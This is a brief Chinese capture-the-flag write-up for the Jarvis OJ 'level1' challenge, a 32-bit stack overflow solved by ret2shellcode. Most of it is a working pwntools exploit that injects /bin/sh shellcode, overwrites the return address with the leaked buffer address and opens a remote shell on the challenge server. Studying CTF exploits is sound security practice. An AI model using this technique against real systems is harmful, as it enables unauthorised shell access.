nc pwn2.jarvisoj.com 9877

 

 



level1.80eacdcd51aca92af7749d96efad7fb5

 

32位栈溢出,ret2shellcode

exp如下:

from pwn import *

#io = process('./level1')
io = remote('pwn2.jarvisoj.com', 9877)

context.arch = 'i386'
context.os = 'linux'

shellcode = asm(shellcraft.sh())

io.recvuntil("What's this:")
buf_addr = int(io.recvuntil('?', drop = True), 16)
info("buf_addr:" + str(hex(buf_addr)))
payload = shellcode.ljust(140, b'\x90')
payload += p32(buf_addr)
io.send(payload)

io.interactive()

 

相关文章:

  • 2022-01-09
  • 2021-08-01
  • 2022-12-23
  • 2021-08-04
  • 2022-12-23
  • 2021-09-29
  • 2021-09-17
  • 2021-10-18
猜你喜欢
  • 2022-01-27
  • 2021-04-17
  • 2021-09-17
  • 2021-10-05
  • 2021-10-03
  • 2021-10-17
  • 2021-10-16
相关资源
相似解决方案